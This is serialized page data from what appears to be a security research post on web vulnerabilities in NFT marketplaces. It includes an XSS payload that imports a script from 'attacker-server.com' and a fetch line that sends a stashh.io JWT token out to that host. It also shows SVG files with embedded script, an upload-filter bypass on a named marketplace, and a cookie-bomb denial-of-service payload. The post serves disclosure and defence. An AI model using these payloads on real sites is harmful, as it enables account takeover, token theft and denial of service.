:385},[40089],{"type":30,"value":523},{"type":24,"tag":301,"props":40091,"children":40092},{"style":329},[40093],{"type":30,"value":39270},{"type":24,"tag":301,"props":40095,"children":40096},{"style":39126},[40097],{"type":30,"value":12812},{"type":24,"tag":301,"props":40099,"children":40100},{"class":303,"line":401},[40101,40105,40109,40113,40117,40121,40125,40129,40133,40137,40141,40145],{"type":24,"tag":301,"props":40102,"children":40103},{"style":39126},[40104],{"type":30,"value":39282},{"type":24,"tag":301,"props":40106,"children":40107},{"style":348},[40108],{"type":30,"value":15181},{"type":24,"tag":301,"props":40110,"children":40111},{"style":369},[40112],{"type":30,"value":39291},{"type":24,"tag":301,"props":40114,"children":40115},{"style":385},[40116],{"type":30,"value":523},{"type":24,"tag":301,"props":40118,"children":40119},{"style":329},[40120],{"type":30,"value":39300},{"type":24,"tag":301,"props":40122,"children":40123},{"style":369},[40124],{"type":30,"value":39305},{"type":24,"tag":301,"props":40126,"children":40127},{"style":385},[40128],{"type":30,"value":523},{"type":24,"tag":301,"props":40130,"children":40131},{"style":329},[40132],{"type":30,"value":39314},{"type":24,"tag":301,"props":40134,"children":40135},{"style":369},[40136],{"type":30,"value":39206},{"type":24,"tag":301,"props":40138,"children":40139},{"style":385},[40140],{"type":30,"value":523},{"type":24,"tag":301,"props":40142,"children":40143},{"style":329},[40144],{"type":30,"value":39327},{"type":24,"tag":301,"props":40146,"children":40147},{"style":39126},[40148],{"type":30,"value":12812},{"type":24,"tag":301,"props":40150,"children":40151},{"class":303,"line":415},[40152,40156,40160,40164,40168,40172,40176,40180,40184,40188,40192,40196,40201,40205,40210,40214,40219,40223,40228,40233,40237,40241,40246,40251,40256,40261,40266,40271,40275,40280,40284,40288,40293,40297,40302,40307,40312,40316,40320,40324,40329,40333],{"type":24,"tag":301,"props":40153,"children":40154},{"style":39126},[40155],{"type":30,"value":39339},{"type":24,"tag":301,"props":40157,"children":40158},{"style":348},[40159],{"type":30,"value":15181},{"type":24,"tag":301,"props":40161,"children":40162},{"style":369},[40163],{"type":30,"value":39291},{"type":24,"tag":301,"props":40165,"children":40166},{"style":385},[40167],{"type":30,"value":523},{"type":24,"tag":301,"props":40169,"children":40170},{"style":329},[40171],{"type":30,"value":39356},{"type":24,"tag":301,"props":40173,"children":40174},{"style":369},[40175],{"type":30,"value":39305},{"type":24,"tag":301,"props":40177,"children":40178},{"style":385},[40179],{"type":30,"value":523},{"type":24,"tag":301,"props":40181,"children":40182},{"style":329},[40183],{"type":30,"value":39369},{"type":24,"tag":301,"props":40185,"children":40186},{"style":369},[40187],{"type":30,"value":39261},{"type":24,"tag":301,"props":40189,"children":40190},{"style":385},[40191],{"type":30,"value":523},{"type":24,"tag":301,"props":40193,"children":40194},{"style":329},[40195],{"type":30,"value":9408},{"type":24,"tag":301,"props":40197,"children":40198},{"style":348},[40199],{"type":30,"value":40200},"{"",{"type":24,"tag":301,"props":40202,"children":40203},{"style":329},[40204],{"type":30,"value":39391},{"type":24,"tag":301,"props":40206,"children":40207},{"style":348},[40208],{"type":30,"value":40209},"":"<",{"type":24,"tag":301,"props":40211,"children":40212},{"style":329},[40213],{"type":30,"value":177},{"type":24,"tag":301,"props":40215,"children":40216},{"style":348},[40217],{"type":30,"value":40218},"/",{"type":24,"tag":301,"props":40220,"children":40221},{"style":329},[40222],{"type":30,"value":39420},{"type":24,"tag":301,"props":40224,"children":40225},{"style":348},[40226],{"type":30,"value":40227},"=",{"type":24,"tag":301,"props":40229,"children":40230},{"style":329},[40231],{"type":30,"value":40232},"x onerror",{"type":24,"tag":301,"props":40234,"children":40235},{"style":348},[40236],{"type":30,"value":40227},{"type":24,"tag":301,"props":40238,"children":40239},{"style":329},[40240],{"type":30,"value":26255},{"type":24,"tag":301,"props":40242,"children":40243},{"style":348},[40244],{"type":30,"value":40245},"(`",{"type":24,"tag":301,"props":40247,"children":40248},{"style":329},[40249],{"type":30,"value":40250},"https",{"type":24,"tag":301,"props":40252,"children":40253},{"style":348},[40254],{"type":30,"value":40255},"://",{"type":24,"tag":301,"props":40257,"children":40258},{"style":329},[40259],{"type":30,"value":40260},"attacker-server",{"type":24,"tag":301,"props":40262,"children":40263},{"style":348},[40264],{"type":30,"value":40265},".",{"type":24,"tag":301,"props":40267,"children":40268},{"style":329},[40269],{"type":30,"value":40270},"com",{"type":24,"tag":301,"props":40272,"children":40273},{"style":348},[40274],{"type":30,"value":40218},{"type":24,"tag":301,"props":40276,"children":40277},{"style":329},[40278],{"type":30,"value":40279},"leak",{"type":24,"tag":301,"props":40281,"children":40282},{"style":348},[40283],{"type":30,"value":40265},{"type":24,"tag":301,"props":40285,"children":40286},{"style":329},[40287],{"type":30,"value":38121},{"type":24,"tag":301,"props":40289,"children":40290},{"style":348},[40291],{"type":30,"value":40292},"`)>","",{"type":24,"tag":301,"props":40294,"children":40295},{"style":329},[40296],{"type":30,"value":39478},{"type":24,"tag":301,"props":40298,"children":40299},{"style":348},[40300],{"type":30,"value":40301},"":"",{"type":24,"tag":301,"props":40303,"children":40304},{"style":329},[40305],{"type":30,"value":40306},"profile-assets",{"type":24,"tag":301,"props":40308,"children":40309},{"style":348},[40310],{"type":30,"value":40311},"","",{"type":24,"tag":301,"props":40313,"children":40314},{"style":329},[40315],{"type":30,"value":7026},{"type":24,"tag":301,"props":40317,"children":40318},{"style":348},[40319],{"type":30,"value":40301},{"type":24,"tag":301,"props":40321,"children":40322},{"style":329},[40323],{"type":30,"value":39515},{"type":24,"tag":301,"props":40325,"children":40326},{"style":348},[40327],{"type":30,"value":40328},""}",{"type":24,"tag":301,"props":40330,"children":40331},{"style":329},[40332],{"type":30,"value":9408},{"type":24,"tag":301,"props":40334,"children":40335},{"style":39126},[40336],{"type":30,"value":39529},{"type":24,"tag":301,"props":40338,"children":40339},{"class":303,"line":439},[40340,40344,40348,40352,40356,40360,40364,40368,40372],{"type":24,"tag":301,"props":40341,"children":40342},{"style":39126},[40343],{"type":30,"value":39339},{"type":24,"tag":301,"props":40345,"children":40346},{"style":348},[40347],{"type":30,"value":15181},{"type":24,"tag":301,"props":40349,"children":40350},{"style":369},[40351],{"type":30,"value":39291},{"type":24,"tag":301,"props":40353,"children":40354},{"style":385},[40355],{"type":30,"value":523},{"type":24,"tag":301,"props":40357,"children":40358},{"style":329},[40359],{"type":30,"value":39553},{"type":24,"tag":301,"props":40361,"children":40362},{"style":369},[40363],{"type":30,"value":39261},{"type":24,"tag":301,"props":40365,"children":40366},{"style":385},[40367],{"type":30,"value":523},{"type":24,"tag":301,"props":40369,"children":40370},{"style":329},[40371],{"type":30,"value":39566},{"type":24,"tag":301,"props":40373,"children":40374},{"style":39126},[40375],{"type":30,"value":39529},{"type":24,"tag":301,"props":40377,"children":40378},{"class":303,"line":447},[40379,40383,40387],{"type":24,"tag":301,"props":40380,"children":40381},{"style":39126},[40382],{"type":30,"value":39578},{"type":24,"tag":301,"props":40384,"children":40385},{"style":348},[40386],{"type":30,"value":39201},{"type":24,"tag":301,"props":40388,"children":40389},{"style":39126},[40390],{"type":30,"value":12812},{"type":24,"tag":301,"props":40392,"children":40393},{"class":303,"line":476},[40394,40398,40402],{"type":24,"tag":301,"props":40395,"children":40396},{"style":39126},[40397],{"type":30,"value":39594},{"type":24,"tag":301,"props":40399,"children":40400},{"style":348},[40401],{"type":30,"value":39150},{"type":24,"tag":301,"props":40403,"children":40404},{"style":39126},[40405],{"type":30,"value":12812},{"type":24,"tag":301,"props":40407,"children":40408},{"class":303,"line":495},[40409],{"type":24,"tag":301,"props":40410,"children":40411},{"emptyLinePlaceholder":16},[40412],{"type":30,"value":341},{"type":24,"tag":301,"props":40414,"children":40415},{"class":303,"line":504},[40416,40420,40424],{"type":24,"tag":301,"props":40417,"children":40418},{"style":39126},[40419],{"type":30,"value":39145},{"type":24,"tag":301,"props":40421,"children":40422},{"style":348},[40423],{"type":30,"value":39166},{"type":24,"tag":301,"props":40425,"children":40426},{"style":39126},[40427],{"type":30,"value":12812},{"type":24,"tag":301,"props":40429,"children":40430},{"class":303,"line":512},[40431],{"type":24,"tag":301,"props":40432,"children":40433},{"emptyLinePlaceholder":16},[40434],{"type":30,"value":341},{"type":24,"tag":301,"props":40436,"children":40437},{"class":303,"line":592},[40438,40442],{"type":24,"tag":301,"props":40439,"children":40440},{"style":359},[40441],{"type":30,"value":39639},{"type":24,"tag":301,"props":40443,"children":40444},{"style":348},[40445],{"type":30,"value":799},{"type":24,"tag":301,"props":40447,"children":40448},{"class":303,"line":619},[40449,40453,40457,40461,40465,40469,40473,40477,40481,40485,40489,40493],{"type":24,"tag":301,"props":40450,"children":40451},{"style":369},[40452],{"type":30,"value":39651},{"type":24,"tag":301,"props":40454,"children":40455},{"style":369},[40456],{"type":30,"value":39656},{"type":24,"tag":301,"props":40458,"children":40459},{"style":385},[40460],{"type":30,"value":39661},{"type":24,"tag":301,"props":40462,"children":40463},{"style":308},[40464],{"type":30,"value":39666},{"type":24,"tag":301,"props":40466,"children":40467},{"style":385},[40468],{"type":30,"value":873},{"type":24,"tag":301,"props":40470,"children":40471},{"style":308},[40472],{"type":30,"value":39666},{"type":24,"tag":301,"props":40474,"children":40475},{"style":314},[40476],{"type":30,"value":39679},{"type":24,"tag":301,"props":40478,"children":40479},{"style":385},[40480],{"type":30,"value":362},{"type":24,"tag":301,"props":40482,"children":40483},{"style":329},[40484],{"type":30,"value":39688},{"type":24,"tag":301,"props":40486,"children":40487},{"style":385},[40488],{"type":30,"value":39693},{"type":24,"tag":301,"props":40490,"children":40491},{"style":314},[40492],{"type":30,"value":39698},{"type":24,"tag":301,"props":40494,"children":40495},{"style":385},[40496],{"type":30,"value":14551},{"type":24,"tag":301,"props":40498,"children":40499},{"class":303,"line":635},[40500],{"type":24,"tag":301,"props":40501,"children":40502},{"emptyLinePlaceholder":16},[40503],{"type":30,"value":341},{"type":24,"tag":301,"props":40505,"children":40506},{"class":303,"line":643},[40507,40511,40515,40519,40523,40527,40531,40535,40539,40543,40547,40551,40555],{"type":24,"tag":301,"props":40508,"children":40509},{"style":369},[40510],{"type":30,"value":9900},{"type":24,"tag":301,"props":40512,"children":40513},{"style":369},[40514],{"type":30,"value":39721},{"type":24,"tag":301,"props":40516,"children":40517},{"style":385},[40518],{"type":30,"value":39661},{"type":24,"tag":301,"props":40520,"children":40521},{"style":348},[40522],{"type":30,"value":21913},{"type":24,"tag":301,"props":40524,"children":40525},{"style":314},[40526],{"type":30,"value":39734},{"type":24,"tag":301,"props":40528,"children":40529},{"style":385},[40530],{"type":30,"value":39739},{"type":24,"tag":301,"props":40532,"children":40533},{"style":369},[40534],{"type":30,"value":39698},{"type":24,"tag":301,"props":40536,"children":40537},{"style":385},[40538],{"type":30,"value":551},{"type":24,"tag":301,"props":40540,"children":40541},{"style":329},[40542],{"type":30,"value":39752},{"type":24,"tag":301,"props":40544,"children":40545},{"style":385},[40546],{"type":30,"value":39757},{"type":24,"tag":301,"props":40548,"children":40549},{"style":369},[40550],{"type":30,"value":39762},{"type":24,"tag":301,"props":40552,"children":40553},{"style":329},[40554],{"type":30,"value":39767},{"type":24,"tag":301,"props":40556,"children":40557},{"style":385},[40558],{"type":30,"value":39772},{"type":24,"tag":301,"props":40560,"children":40561},{"class":303,"line":652},[40562,40566,40570,40574,40578,40582],{"type":24,"tag":301,"props":40563,"children":40564},{"style":369},[40565],{"type":30,"value":39651},{"type":24,"tag":301,"props":40567,"children":40568},{"style":369},[40569],{"type":30,"value":39784},{"type":24,"tag":301,"props":40571,"children":40572},{"style":385},[40573],{"type":30,"value":39661},{"type":24,"tag":301,"props":40575,"children":40576},{"style":348},[40577],{"type":30,"value":21913},{"type":24,"tag":301,"props":40579,"children":40580},{"style":314},[40581],{"type":30,"value":39797},{"type":24,"tag":301,"props":40583,"children":40584},{"style":385},[40585],{"type":30,"value":4859},{"type":24,"tag":301,"props":40587,"children":40588},{"class":303,"line":666},[40589,40593,40597,40601,40605,40609,40613,40617],{"type":24,"tag":301,"props":40590,"children":40591},{"style":369},[40592],{"type":30,"value":39809},{"type":24,"tag":301,"props":40594,"children":40595},{"style":385},[40596],{"type":30,"value":206},{"type":24,"tag":301,"props":40598,"children":40599},{"style":369},[40600],{"type":30,"value":39818},{"type":24,"tag":301,"props":40602,"children":40603},{"style":385},[40604],{"type":30,"value":206},{"type":24,"tag":301,"props":40606,"children":40607},{"style":314},[40608],{"type":30,"value":16443},{"type":24,"tag":301,"props":40610,"children":40611},{"style":385},[40612],{"type":30,"value":362},{"type":24,"tag":301,"props":40614,"children":40615},{"style":369},[40616],{"type":30,"value":39835},{"type":24,"tag":301,"props":40618,"children":40619},{"style":385},[40620],{"type":30,"value":589},{"type":24,"tag":301,"props":40622,"children":40623},{"class":303,"line":674},[40624],{"type":24,"tag":301,"props":40625,"children":40626},{"emptyLinePlaceholder":16},[40627],{"type":30,"value":341},{"type":24,"tag":301,"props":40629,"children":40630},{"class":303,"line":692},[40631,40635,40639,40643,40647,40651,40655,40659],{"type":24,"tag":301,"props":40632,"children":40633},{"style":369},[40634],{"type":30,"value":39854},{"type":24,"tag":301,"props":40636,"children":40637},{"style":385},[40638],{"type":30,"value":206},{"type":24,"tag":301,"props":40640,"children":40641},{"style":369},[40642],{"type":30,"value":39863},{"type":24,"tag":301,"props":40644,"children":40645},{"style":385},[40646],{"type":30,"value":39661},{"type":24,"tag":301,"props":40648,"children":40649},{"style":369},[40650],{"type":30,"value":39872},{"type":24,"tag":301,"props":40652,"children":40653},{"style":385},[40654],{"type":30,"value":206},{"type":24,"tag":301,"props":40656,"children":40657},{"style":369},[40658],{"type":30,"value":39863},{"type":24,"tag":301,"props":40660,"children":40661},{"style":385},[40662],{"type":30,"value":492},{"type":24,"tag":301,"props":40664,"children":40665},{"class":303,"line":3631},[40666],{"type":24,"tag":301,"props":40667,"children":40668},{"emptyLinePlaceholder":16},[40669],{"type":30,"value":341},{"type":24,"tag":301,"props":40671,"children":40672},{"class":303,"line":3639},[40673,40678,40682,40687],{"type":24,"tag":301,"props":40674,"children":40675},{"style":369},[40676],{"type":30,"value":40677}," form123",{"type":24,"tag":301,"props":40679,"children":40680},{"style":385},[40681],{"type":30,"value":206},{"type":24,"tag":301,"props":40683,"children":40684},{"style":314},[40685],{"type":30,"value":40686},"submit",{"type":24,"tag":301,"props":40688,"children":40689},{"style":385},[40690],{"type":30,"value":14551},{"type":24,"tag":301,"props":40692,"children":40693},{"class":303,"line":3647},[40694,40698],{"type":24,"tag":301,"props":40695,"children":40696},{"style":348},[40697],{"type":30,"value":39892},{"type":24,"tag":301,"props":40699,"children":40700},{"style":359},[40701],{"type":30,"value":39897},{"type":24,"tag":301,"props":40703,"children":40704},{"class":303,"line":3685},[40705],{"type":24,"tag":301,"props":40706,"children":40707},{"emptyLinePlaceholder":16},[40708],{"type":30,"value":341},{"type":24,"tag":301,"props":40710,"children":40711},{"class":303,"line":3713},[40712,40716,40720],{"type":24,"tag":301,"props":40713,"children":40714},{"style":39126},[40715],{"type":30,"value":39594},{"type":24,"tag":301,"props":40717,"children":40718},{"style":348},[40719],{"type":30,"value":39166},{"type":24,"tag":301,"props":40721,"children":40722},{"style":39126},[40723],{"type":30,"value":12812},{"type":24,"tag":301,"props":40725,"children":40726},{"class":303,"line":3721},[40727,40731,40735],{"type":24,"tag":301,"props":40728,"children":40729},{"style":39126},[40730],{"type":30,"value":39180},{"type":24,"tag":301,"props":40732,"children":40733},{"style":348},[40734],{"type":30,"value":39133},{"type":24,"tag":301,"props":40736,"children":40737},{"style":39126},[40738],{"type":30,"value":12812},{"type":24,"tag":32,"props":40740,"children":40741},{},[40742],{"type":30,"value":40743},"This script automatically sends the following config in POST body, which triggers the XSS and imports a malicious javascript file from attacker's server:",{"type":24,"tag":291,"props":40745,"children":40747},{"className":6681,"code":40746,"language":6680,"meta":7,"style":7},"{\n \"address\": \"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\",\n \"to\": \"profile-assets\",\n \"type\": \"icon\"\n}\n",[40748],{"type":24,"tag":145,"props":40749,"children":40750},{"__ignoreMap":7},[40751,40758,40779,40800,40817],{"type":24,"tag":301,"props":40752,"children":40753},{"class":303,"line":304},[40754],{"type":24,"tag":301,"props":40755,"children":40756},{"style":359},[40757],{"type":30,"value":799},{"type":24,"tag":301,"props":40759,"children":40760},{"class":303,"line":320},[40761,40766,40770,40775],{"type":24,"tag":301,"props":40762,"children":40763},{"style":369},[40764],{"type":30,"value":40765}," \"address\"",{"type":24,"tag":301,"props":40767,"children":40768},{"style":359},[40769],{"type":30,"value":5615},{"type":24,"tag":301,"props":40771,"children":40772},{"style":329},[40773],{"type":30,"value":40774},"\"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\"",{"type":24,"tag":301,"props":40776,"children":40777},{"style":359},[40778],{"type":30,"value":1729},{"type":24,"tag":301,"props":40780,"children":40781},{"class":303,"line":335},[40782,40787,40791,40796],{"type":24,"tag":301,"props":40783,"children":40784},{"style":369},[40785],{"type":30,"value":40786}," \"to\"",{"type":24,"tag":301,"props":40788,"children":40789},{"style":359},[40790],{"type":30,"value":5615},{"type":24,"tag":301,"props":40792,"children":40793},{"style":329},[40794],{"type":30,"value":40795},"\"profile-assets\"",{"type":24,"tag":301,"props":40797,"children":40798},{"style":359},[40799],{"type":30,"value":1729},{"type":24,"tag":301,"props":40801,"children":40802},{"class":303,"line":344},[40803,40808,40812],{"type":24,"tag":301,"props":40804,"children":40805},{"style":369},[40806],{"type":30,"value":40807}," \"type\"",{"type":24,"tag":301,"props":40809,"children":40810},{"style":359},[40811],{"type":30,"value":5615},{"type":24,"tag":301,"props":40813,"children":40814},{"style":329},[40815],{"type":30,"value":40816},"\"icon\"\n",{"type":24,"tag":301,"props":40818,"children":40819},{"class":303,"line":401},[40820],{"type":24,"tag":301,"props":40821,"children":40822},{"style":359},[40823],{"type":30,"value":698},{"type":24,"tag":32,"props":40825,"children":40826},{},[40827],{"type":30,"value":40828},"Then, the imported script is able to exfiltrate the JWT authentication token from stashh.io:",{"type":24,"tag":291,"props":40830,"children":40832},{"className":38119,"code":40831,"language":38121,"meta":7,"style":7},"fetch(`https://attacker-server.com/?token_leak=${localStorage.getItem('token')}`);\n",[40833],{"type":24,"tag":145,"props":40834,"children":40835},{"__ignoreMap":7},[40836],{"type":24,"tag":301,"props":40837,"children":40838},{"class":303,"line":304},[40839,40844,40848,40853,40858,40863,40867,40872,40876,40881,40885,40890,40894],{"type":24,"tag":301,"props":40840,"children":40841},{"style":314},[40842],{"type":30,"value":40843},"fetch",{"type":24,"tag":301,"props":40845,"children":40846},{"style":359},[40847],{"type":30,"value":362},{"type":24,"tag":301,"props":40849,"children":40850},{"style":329},[40851],{"type":30,"value":40852},"`https://attacker-server.com/?token_leak=",{"type":24,"tag":301,"props":40854,"children":40855},{"style":348},[40856],{"type":30,"value":40857},"${",{"type":24,"tag":301,"props":40859,"children":40860},{"style":369},[40861],{"type":30,"value":40862},"localStorage",{"type":24,"tag":301,"props":40864,"children":40865},{"style":385},[40866],{"type":30,"value":206},{"type":24,"tag":301,"props":40868,"children":40869},{"style":314},[40870],{"type":30,"value":40871},"getItem",{"type":24,"tag":301,"props":40873,"children":40874},{"style":385},[40875],{"type":30,"value":362},{"type":24,"tag":301,"props":40877,"children":40878},{"style":329},[40879],{"type":30,"value":40880},"'token'",{"type":24,"tag":301,"props":40882,"children":40883},{"style":385},[40884],{"type":30,"value":9961},{"type":24,"tag":301,"props":40886,"children":40887},{"style":348},[40888],{"type":30,"value":40889},"}",{"type":24,"tag":301,"props":40891,"children":40892},{"style":329},[40893],{"type":30,"value":17186},{"type":24,"tag":301,"props":40895,"children":40896},{"style":359},[40897],{"type":30,"value":589},{"type":24,"tag":80,"props":40899,"children":40901},{"id":40900},"svgs",[40902],{"type":30,"value":40903},"SVGs",{"type":24,"tag":32,"props":40905,"children":40906},{},[40907],{"type":30,"value":40908},"After closely analyzing various NFT marketplaces, we noticed a common shared feature; the ability to update profile pictures or insert NFT assets using SVG files. SVG is an XML- based format that defines graphics and how they interact.",{"type":24,"tag":32,"props":40910,"children":40911},{},[40912],{"type":30,"value":40913},"Unbeknownst to some people, SVG files can contain JavaScript and run arbitrary scripts.",{"type":24,"tag":291,"props":40915,"children":40917},{"className":38119,"code":40916,"language":38121,"meta":7,"style":7},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n \u003Ctitle>XSS\u003C/title>\n \u003Cscript type=\"text/javascript\">\n alert(document.domain);\n \u003C/script>\n \u003C/svg>\n",[40918],{"type":24,"tag":145,"props":40919,"children":40920},{"__ignoreMap":7},[40921,40967,41004,41011,41041,41073,41101,41109,41125],{"type":24,"tag":301,"props":40922,"children":40923},{"class":303,"line":304},[40924,40929,40934,40939,40943,40948,40953,40957,40962],{"type":24,"tag":301,"props":40925,"children":40926},{"style":385},[40927],{"type":30,"value":40928},"\u003C?",{"type":24,"tag":301,"props":40930,"children":40931},{"style":369},[40932],{"type":30,"value":40933},"xml",{"type":24,"tag":301,"props":40935,"children":40936},{"style":369},[40937],{"type":30,"value":40938}," version",{"type":24,"tag":301,"props":40940,"children":40941},{"style":385},[40942],{"type":30,"value":523},{"type":24,"tag":301,"props":40944,"children":40945},{"style":329},[40946],{"type":30,"value":40947},"\"1.0\"",{"type":24,"tag":301,"props":40949,"children":40950},{"style":369},[40951],{"type":30,"value":40952}," encoding",{"type":24,"tag":301,"props":40954,"children":40955},{"style":385},[40956],{"type":30,"value":523},{"type":24,"tag":301,"props":40958,"children":40959},{"style":329},[40960],{"type":30,"value":40961},"\"UTF-8\"",{"type":24,"tag":301,"props":40963,"children":40964},{"style":385},[40965],{"type":30,"value":40966},"?>\n",{"type":24,"tag":301,"props":40968,"children":40969},{"class":303,"line":320},[40970,40975,40980,40985,40990,40995,41000],{"type":24,"tag":301,"props":40971,"children":40972},{"style":385},[40973],{"type":30,"value":40974},"\u003C!",{"type":24,"tag":301,"props":40976,"children":40977},{"style":369},[40978],{"type":30,"value":40979},"DOCTYPE",{"type":24,"tag":301,"props":40981,"children":40982},{"style":369},[40983],{"type":30,"value":40984}," svg",{"type":24,"tag":301,"props":40986,"children":40987},{"style":369},[40988],{"type":30,"value":40989}," PUBLIC",{"type":24,"tag":301,"props":40991,"children":40992},{"style":329},[40993],{"type":30,"value":40994}," \"-//W3C//DTD SVG 1.1//EN\"",{"type":24,"tag":301,"props":40996,"children":40997},{"style":329},[40998],{"type":30,"value":40999}," \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"",{"type":24,"tag":301,"props":41001,"children":41002},{"style":385},[41003],{"type":30,"value":12812},{"type":24,"tag":301,"props":41005,"children":41006},{"class":303,"line":335},[41007],{"type":24,"tag":301,"props":41008,"children":41009},{"emptyLinePlaceholder":16},[41010],{"type":30,"value":341},{"type":24,"tag":301,"props":41012,"children":41013},{"class":303,"line":344},[41014,41018,41023,41028,41032,41037],{"type":24,"tag":301,"props":41015,"children":41016},{"style":39126},[41017],{"type":30,"value":3950},{"type":24,"tag":301,"props":41019,"children":41020},{"style":348},[41021],{"type":30,"value":41022},"svg",{"type":24,"tag":301,"props":41024,"children":41025},{"style":369},[41026],{"type":30,"value":41027}," xmlns",{"type":24,"tag":301,"props":41029,"children":41030},{"style":385},[41031],{"type":30,"value":523},{"type":24,"tag":301,"props":41033,"children":41034},{"style":329},[41035],{"type":30,"value":41036},"\"http://www.w3.org/2000/svg\"",{"type":24,"tag":301,"props":41038,"children":41039},{"style":39126},[41040],{"type":30,"value":12812},{"type":24,"tag":301,"props":41042,"children":41043},{"class":303,"line":401},[41044,41048,41053,41057,41061,41065,41069],{"type":24,"tag":301,"props":41045,"children":41046},{"style":39126},[41047],{"type":30,"value":39145},{"type":24,"tag":301,"props":41049,"children":41050},{"style":348},[41051],{"type":30,"value":41052},"title",{"type":24,"tag":301,"props":41054,"children":41055},{"style":39126},[41056],{"type":30,"value":1456},{"type":24,"tag":301,"props":41058,"children":41059},{"style":359},[41060],{"type":30,"value":37993},{"type":24,"tag":301,"props":41062,"children":41063},{"style":39126},[41064],{"type":30,"value":39180},{"type":24,"tag":301,"props":41066,"children":41067},{"style":348},[41068],{"type":30,"value":41052},{"type":24,"tag":301,"props":41070,"children":41071},{"style":39126},[41072],{"type":30,"value":12812},{"type":24,"tag":301,"props":41074,"children":41075},{"class":303,"line":415},[41076,41080,41084,41088,41092,41097],{"type":24,"tag":301,"props":41077,"children":41078},{"style":39126},[41079],{"type":30,"value":39145},{"type":24,"tag":301,"props":41081,"children":41082},{"style":348},[41083],{"type":30,"value":39166},{"type":24,"tag":301,"props":41085,"children":41086},{"style":369},[41087],{"type":30,"value":39291},{"type":24,"tag":301,"props":41089,"children":41090},{"style":385},[41091],{"type":30,"value":523},{"type":24,"tag":301,"props":41093,"children":41094},{"style":329},[41095],{"type":30,"value":41096},"\"text/javascript\"",{"type":24,"tag":301,"props":41098,"children":41099},{"style":39126},[41100],{"type":30,"value":12812},{"type":24,"tag":301,"props":41102,"children":41103},{"class":303,"line":439},[41104],{"type":24,"tag":301,"props":41105,"children":41106},{"style":359},[41107],{"type":30,"value":41108}," alert(document.domain);\n",{"type":24,"tag":301,"props":41110,"children":41111},{"class":303,"line":447},[41112,41117,41121],{"type":24,"tag":301,"props":41113,"children":41114},{"style":39126},[41115],{"type":30,"value":41116}," \u003C/",{"type":24,"tag":301,"props":41118,"children":41119},{"style":348},[41120],{"type":30,"value":39166},{"type":24,"tag":301,"props":41122,"children":41123},{"style":39126},[41124],{"type":30,"value":12812},{"type":24,"tag":301,"props":41126,"children":41127},{"class":303,"line":476},[41128,41133,41137],{"type":24,"tag":301,"props":41129,"children":41130},{"style":39126},[41131],{"type":30,"value":41132}," \u003C/",{"type":24,"tag":301,"props":41134,"children":41135},{"style":348},[41136],{"type":30,"value":41022},{"type":24,"tag":301,"props":41138,"children":41139},{"style":39126},[41140],{"type":30,"value":12812},{"type":24,"tag":32,"props":41142,"children":41143},{},[41144,41146,41153],{"type":30,"value":41145},"Although some marketplaces restrict the upload of SVG files, we discovered a way to bypass these checks. One particular instance involved the ",{"type":24,"tag":188,"props":41147,"children":41150},{"href":41148,"rel":41149},"https://xtingles.com/",[192],[41151],{"type":30,"value":41152},"xtingles Marketplace",{"type":30,"value":206},{"type":24,"tag":32,"props":41155,"children":41156},{},[41157],{"type":30,"value":41158},"Even though the file extension was validated based on its name, the content type was not checked. By renaming a file with an allowed extension and inserting an SVG file with the content type \"svg+xml,\", we were able to successfully upload the SVG file.",{"type":24,"tag":32,"props":41160,"children":41161},{},[41162],{"type":30,"value":41163},"Below, we show you how we did it.",{"type":24,"tag":32,"props":41165,"children":41166},{},[41167],{"type":30,"value":41168},"Request when the original SVG was sent, showing it is not accepted as format:",{"type":24,"tag":32,"props":41170,"children":41171},{},[41172],{"type":24,"tag":177,"props":41173,"children":41175},{"alt":7,"src":41174},"/posts/web2-bug-repellant-instructions/svg-1.png",[],{"type":24,"tag":32,"props":41177,"children":41178},{},[41179],{"type":30,"value":41180},"After changing the extension inside the file name.",{"type":24,"tag":32,"props":41182,"children":41183},{},[41184],{"type":24,"tag":177,"props":41185,"children":41187},{"alt":7,"src":41186},"/posts/web2-bug-repellant-instructions/svg-2.png",[],{"type":24,"tag":80,"props":41189,"children":41191},{"id":41190},"svgs-return",[41192],{"type":30,"value":41193},"SVGs Return",{"type":24,"tag":32,"props":41195,"children":41196},{},[41197],{"type":30,"value":41198},"We'll give credit where it's due. Some marketplaces mitigate the impact of XSS by storing images in IPFS, Amazon S3 buckets, or CloudFront.",{"type":24,"tag":32,"props":41200,"children":41201},{},[41202],{"type":30,"value":41203},"Unfortunately, this mitigation is still susceptible to a \"cookie bomb\" attack.",{"type":24,"tag":32,"props":41205,"children":41206},{},[41207],{"type":30,"value":41208},"This type of attack overwhelms a web server with an excessive number of cookies and can be used to achieve a Denial of Service (DoS), preventing users from accessing the file on the third-party service.",{"type":24,"tag":291,"props":41210,"children":41214},{"className":41211,"code":41212,"language":41213,"meta":7,"style":7},"language-jsx shiki shiki-themes slack-dark","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n \u003Ctitle>XSS\u003C/title>\n \u003Cscript type=\"text/javascript\">\n var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n var Set_Cookie = Array(10000).join('a');\n\n for (var i = 1; i \u003C 99; i++) {\n document.cookie = 'Cookie' + i + '=' + Set_Cookie + ';Domain=' + Take_Domain;\n }\n \u003C/script>\n 